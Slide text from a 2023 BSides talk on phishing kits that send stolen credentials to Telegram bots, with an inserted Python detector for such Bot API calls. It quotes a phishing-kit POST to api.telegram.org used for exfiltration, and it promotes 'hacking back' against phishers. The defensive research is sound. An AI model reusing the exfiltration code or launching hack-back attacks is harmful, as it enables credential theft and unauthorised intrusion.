Talk given at BSides Colombia 2023 (April 2023)
Video: https://www.youtube.com/watch?v=YTz1yQGyFLw
Project: https://github.com/avechuch0/telegram-hitbackscammer
2. Contents
01 The use of Telegram as part of the current threat landscape
02 How this research started
03 Final product of this research as a response to mitigate these issues
3. About me
Just a guy with the goal of overcoming himself
Threat Intel, Digital Forensics, Malware Analysis,
CloudSec, Pentesting… These little things…
GCFA, GCPN, CISM, CSX, PMP, IA-ISO27001
University Teacher – Researcher – Speaker
Lover of nature, Musician
IBMer, X-Force Incident Response
6. 1. Weaponization: Attacker gets a Telegram bot using the BotFather for malicious purposes
2. Delivery: Phishing/Smishing. Victims fill data managed by malicious bot
3. Impact and monetization: Credentials stolen for money transfer/withdraw
POST REQUEST
…
var settings = {
  "async": true,
  "crossDomain": true,
  "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
  "method": "POST",
…
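A defender triaging a captured phishing page can flag the Bot API call shown in the POST request above. The following is an added example, not code from the talk or from the telegram-hitbackscammer project; the function name, the finding fields and the sample input (including its made-up token) are assumptions constructed for illustration.

```python
import re

# Bot API URLs look like https://api.telegram.org/bot<id>:<secret>/<method>.
HOST = re.compile(r"api\.telegram\.org/bot")
LITERAL = re.compile(r"api\.telegram\.org/bot(\d{6,12}):[\w-]{30,}/(\w+)")
# Token spliced in from a variable, as on the slide:
#   "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage"
QUOTE = r"""["'`]"""
SPLICED = re.compile(r"api\.telegram\.org/bot" + QUOTE + r"\s*\+\s*([\w.$]+)\s*\+\s*"
                     + QUOTE + r"/(\w+)")

# Constructed sample: the slide's fragment plus a line with a made-up literal token.
SAMPLE = '''\
var settings = {
  "async": true,
  "crossDomain": true,
  "url":
    "https://api.telegram.org/bot"
    + telegram_bot_id +
    "/sendMessage",
  "method": "POST"
};
fetch("https://api.telegram.org/bot123456789:AAExampleExampleExampleExampleExample/sendDocument");
'''


def find_telegram_exfil(source):
    """Return one finding per Telegram Bot API reference in a page or script."""
    findings = []
    for hit in HOST.finditer(source):
        line = source.count("\n", 0, hit.start()) + 1
        literal = LITERAL.match(source, hit.start())
        spliced = SPLICED.match(source, hit.start())
        if literal:  # report the numeric bot id only, never the secret part
            findings.append({"line": line, "kind": "literal-token",
                             "bot_id": literal.group(1), "method": literal.group(2)})
        elif spliced:  # token lives in a variable defined elsewhere in the kit
            findings.append({"line": line, "kind": "variable-token",
                             "variable": spliced.group(1), "method": spliced.group(2)})
        else:  # host is referenced but the URL is assembled some other way
            findings.append({"line": line, "kind": "unresolved"})
    return findings


if __name__ == "__main__":
    for finding in find_telegram_exfil(SAMPLE):
        print(finding)
```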
So, what's the fuss?
8. So, what is Telegram-hitbackscammer?
A set of protocols to screw up the malicious activities of phishers who store the victim's stolen data on Telegram chats/channels
Attribution
Annoyance
Attack
9. Cybersec theories behind Telegram-hitbackscammer
Triple A of Active Defense
Attribution: Trying to unmask the attackers
Annoyance: Wasting an attacker’s time
Attack: It is hacking… back using pentest tricks
Researchers
Threat hunters
Incident Responders
Developers
10. D.E.M.O?
Is there a demo…? Nope, there is not.
Of course there is, just kidding ☺
https://github.com/avechuch0/telegram-hitbackscammer
11. Closing thoughts
Charity / Crowdfunding / Sponsorship
The current malicious Telegram ecosystem is too large to process!
12. Closing thoughts
Be sure to hack… for good ALWAYS
Spread the word, take it, and use it
https://github.com/avechuch0/telegram-hitbackscammer
QUESTIONS?
@avechuch0
Jaime Andrés Bello Vieda